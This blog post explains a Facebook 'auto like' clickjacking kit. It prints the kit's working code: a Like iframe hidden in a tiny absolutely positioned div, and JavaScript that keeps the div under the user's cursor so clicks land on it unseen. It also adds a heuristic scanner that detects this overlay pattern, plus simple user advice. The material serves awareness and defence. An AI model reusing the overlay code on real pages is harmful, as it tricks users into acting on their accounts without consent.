Many of my friends, including myself, have a facebook account. I am sure there will be a few that remain with the saying or sentiment of “who would want to do that to me?” or “that won’t happen to me”. Well, today I will present to you something I stumbled upon.

Some background: I surf the website digital point to see what’s on the market, as far as business or just curiosity, and I ran into a thread “Facebook AUTO LIKE and POST to wall!!!” My first thought was “WOW, this is foolproof for someone trying to get exposure to their website!” All they need is a high amount of pop-up traffic and something to lure users to click on it. However, after a few moments of thinking about it, the danger and risk set in. How can this be abused? Say you are not trying to promote a product, but instead are trying to push out malware? How can you have an influence on, say, 50 or even 200+ users seeing this? In this short article I am going to outline how this works, and explain more or less how this could be misused.
For you non-tech-savvy users, you can skip to the recommendations / remediation portion. For those of you fellow geeks, here is how this works:
<!--facebook like frame code goes here-->
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.mangawhat.com&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
<!--end facebook like frame code-->
The above code shows one of my URLs, so in the examples following this I will not lead you to a domain that I believe to be unsafe. Basically, this is the iframe that facebook provides webmasters to put on their website(s) so that a user may like it. In normal practice there is nothing wrong with this.
What has been done to it is this: it was put into a div with the id “icontainer”, which was given these properties:
<div style="overflow-x: hidden; overflow-y: hidden; width: 10px; height: 12px; position: absolute; opacity: 50; top: 363px; left: 584px; " id="icontainer">
</div>
The important parts of the above code break down as follows: any overflow is hidden, the width and height are 10×12 pixels (pretty small), and it is set to be invisible so the user can’t even see it.
<script type="text/javascript">
var interval;
$(function() {
    // Poll every 50 ms until keyboard focus lands on the like iframe, i.e. the user has clicked it.
    interval = setInterval("updateActiveElement();", 50);
});
function updateActiveElement() {
    if ($(document.activeElement).attr('id') == "fbframe") {
        clearInterval(interval); // stop polling
        iflag = 1;               // tell the mouse follower (second script) to stop moving the container
    }
}
</script>
and
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body; // create reference to common "body" across doctypes
function mouseFollower(e) {
    /* DO NOT EDIT THIS */
    if (window.event) { // for IE
        icontainer.style.top = (window.event.y - 5) + standardbody.scrollTop + 'px';
        icontainer.style.left = (window.event.x - 5) + standardbody.scrollLeft + 'px';
    } else {
        icontainer.style.top = (e.pageY - 5) + 'px';
        icontainer.style.left = (e.pageX - 5) + 'px';
    }
}
// Keep the hidden container parked under the cursor until the iframe has been clicked (iflag set by the first script).
document.onmousemove = function(e) {
    if (iflag == 0) { mouseFollower(e); }
}
</script>
I am no javascript guru, but based on the source it is powered by those two scripts and jQuery, which is used by many webmasters. I am sure someone in the comments will correct me if I am wrong on this one. The javascript is basically designed to follow the mouse; “icontainer”, as mentioned earlier, is the div that contains the code the potentially malicious user wants you to click on.
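As an added example, not code from the original post or from the kit it describes: a small heuristic scanner that flags an iframe wrapped in a container styled like the “icontainer” div above (absolutely positioned, tiny, overflow hidden) on a page that also installs a mousemove handler. It works on raw HTML text rather than the live DOM, so it runs in Node as well as a browser; the sample HTML inside it is constructed from the snippets above, and the function names are my own. One caveat it encodes: CSS clamps opacity to the 0..1 range, so “opacity: 50” actually renders fully opaque, and the concealment in this kit comes from the 10×12 px box with overflow hidden rather than from transparency.

```javascript
// Added heuristic, not from the original post; it runs on raw HTML text, so no DOM is needed.
function parseInlineStyle(styleText) {
  const style = {};
  for (const decl of styleText.split(";")) {
    const idx = decl.indexOf(":");
    if (idx === -1) continue;
    style[decl.slice(0, idx).trim().toLowerCase()] = decl.slice(idx + 1).trim().toLowerCase();
  }
  return style;
}
function px(value) {
  const m = /^(-?\d+(?:\.\d+)?)px$/.exec(value || "");
  return m ? parseFloat(m[1]) : NaN;
}
// Reasons a container looks like a click-stealing overlay for whatever it frames.
function overlayIndicators(style) {
  const reasons = [];
  if (style.position === "absolute" || style.position === "fixed") reasons.push("absolute/fixed positioning");
  const w = px(style.width), h = px(style.height);
  if (w <= 30 && h <= 30) reasons.push(`tiny ${w}x${h}px box`);
  const clipped = style.overflow === "hidden" ||
    (style["overflow-x"] === "hidden" && style["overflow-y"] === "hidden");
  if (clipped) reasons.push("overflow hidden (clips the framed button down to the box)");
  // CSS clamps opacity to 0..1, so "opacity: 50" renders fully opaque; only <= 0.1 really hides it.
  const o = parseFloat(style.opacity);
  if (!Number.isNaN(o) && Math.min(o, 1) <= 0.1) reasons.push("near-transparent");
  return reasons;
}
// Scan for <div style="..."> ... <iframe src="..."> ... </div> (no nested divs) and score each one.
function findSuspiciousFrames(html) {
  const findings = [];
  const followsMouse = /onmousemove|addEventListener\(\s*['"]mousemove['"]/i.test(html);
  const divRe = /<div\b[^>]*\bstyle="([^"]*)"[^>]*>([\s\S]*?)<\/div>/gi;
  let m;
  while ((m = divRe.exec(html)) !== null) {
    const iframe = /<iframe\b[^>]*\bsrc="([^"]*)"/i.exec(m[2]);
    if (!iframe) continue;
    const reasons = overlayIndicators(parseInlineStyle(m[1]));
    if (followsMouse) reasons.push("page has a mousemove handler (possible mouse follower)");
    if (reasons.length >= 3) findings.push({ src: iframe[1], reasons });
  }
  return findings;
}
// Constructed sample: a normal, visible like button, then the post's icontainer div and follower.
const SAMPLE_HTML = `
<div style="width: 450px"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.mangawhat.com" id="visible"></iframe></div>
<div style="overflow-x: hidden; overflow-y: hidden; width: 10px; height: 12px; position: absolute; opacity: 50; top: 363px; left: 584px; " id="icontainer"><iframe src="http://www.facebook.com/plugins/like.php?href=http://www.mangawhat.com" id="fbframe"></iframe></div>
<script>document.onmousemove = function(e) { if (iflag == 0) { mouseFollower(e); } }</script>`;
console.log(JSON.stringify(findSuspiciousFrames(SAMPLE_HTML), null, 2));
```

The visible button collects only the mousemove reason and is ignored, while the icontainer copy trips four indicators; the regex scan is a triage aid for page source you are reviewing, not a substitute for inspecting computed styles in a real browser.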
Recommendations / Remediation:
I have no official recommendation with regards to fixing this. Sign out of your facebook when you’re done, or when you won’t be at your desk for a while if others are using that machine as well. As an alternative, sign in with a different browser, such as using IE for facebook and Firefox to browse.
Possible Misuse:
Could this be misused? I have no doubt; let’s throw in a hypothetical situation. Say you have a facebook account with 400 friends, you post this inadvertently, 40 users see it, and only 15 click on it. This is like the snowball effect, because more and more users will see it. It could potentially be used to push out malware if used this way, or to simply promote some website. I have seen other methods like this used, however I have not seen this type of thing for sale until today. Could this be used for something other than posting stuff to my wall? I would not rule that out.
Example in action:
The example shown will not make you “like” or post anything offensive on your facebook; once you are done, remove the post from your wall if you would like. Click here for the example.